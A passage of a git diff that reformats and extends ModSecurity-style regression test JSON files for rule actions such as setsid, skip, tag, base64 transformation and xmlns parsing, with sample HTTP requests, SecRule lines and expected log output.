] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var}==test=test,pass\"" ] diff --git a/test/test-cases/regression/action-setrsc.json b/test/test-cases/regression/action-setrsc.json index ffc4e0f226..7be0c0d317 100644 --- a/test/test-cases/regression/action-setrsc.json +++ b/test/test-cases/regression/action-setrsc.json @@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setrsc action", - "expected":{ - "debug_log": "Saving variable: RESOURCE:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setrsc action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: RESOURCE:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setrsc:'test',nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:RESOURCE.score=+10\"", diff --git a/test/test-cases/regression/action-setsid.json b/test/test-cases/regression/action-setsid.json index 2d4e2cddfd..84bdc90db8 100644 --- a/test/test-cases/regression/action-setsid.json +++ b/test/test-cases/regression/action-setsid.json @@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action", - "expected":{ - "debug_log": "Saving variable: SESSION:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: SESSION:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-setuid.json b/test/test-cases/regression/action-setuid.json index 726efd1e64..f9300f5104 100644 --- a/test/test-cases/regression/action-setuid.json +++ b/test/test-cases/regression/action-setuid.json @@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setuid action", - "expected":{ - "debug_log": "Saving variable: USER:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setuid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: USER:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:USER.score=+10\"", diff --git a/test/test-cases/regression/action-skip.json b/test/test-cases/regression/action-skip.json index cb7ba14918..132a9c4215 100644 --- a/test/test-cases/regression/action-skip.json +++ b/test/test-cases/regression/action-skip.json @@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 1/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 1/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:1\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", @@ -34,32 +47,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 2/3", - "expected":{ - "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 2/3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:abc\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", @@ -68,32 +94,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 3/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 3/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:2\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-tag.json b/test/test-cases/regression/action-tag.json index 870297b462..b678f5609b 100644 --- a/test/test-cases/regression/action-tag.json +++ b/test/test-cases/regression/action-tag.json @@ -1,115 +1,119 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 1", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 1", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 2", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 2", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste no-cache", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste no-cache", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste %{REQUEST_HEADERS:Pragma}%',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 7cb047ce2f..5378e54f87 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json @@ -1,88 +1,92 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUyCg==\"" + "expected": { + "debug_log": "t:base64encode: \"dmFsdWUy\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64encode,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "29", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=dmFsdWUy¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64decode: \"value2\"" + "expected": { + "debug_log": "t:base64decode: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64decode,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-xmlns.json b/test/test-cases/regression/action-xmlns.json index df612f20c3..1d7d5acb09 100644 --- a/test/test-cases/regression/action-xmlns.json +++ b/test/test-cases/regression/action-xmlns.json @@ -1,108 +1,196 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 1)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 1)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Bad format, missing equals sign" }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap'http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 2)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 2)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: XMLNS is invalid. Expecting a name=value format." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:=\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 3)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 3)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Missing xmlns href for prefix: `schemas.xmlsoap.org/soap/envelope/'." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap='schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing XML request body parser (validate ok)", - "expected":{ - "debug_log": "Target value: \"39.95\" \\(Variable: XML:\/bookstore\/book\/price\\[text\\(\\)\\]\\)" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + { + "enabled": 1, + "version_min": 300000, + "title": "Testing XML request body parser (validate ok)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: \"39.95\" \\(Variable: XML:/bookstore/book/price\\[text\\(\\)\\]\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/actions.json b/test/test-cases/regression/actions.json index c69f1a7cb0..c07a54e1c5 100644 --- a/test/test-cases/regression/actions.json +++ b/test/test-cases/regression/actions.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,33 +24,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -59,7 +60,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -75,8 +76,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -84,33 +85,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 302, "redirect_url": "http://www.google.com" }, @@ -119,7 +121,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -135,8 +137,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 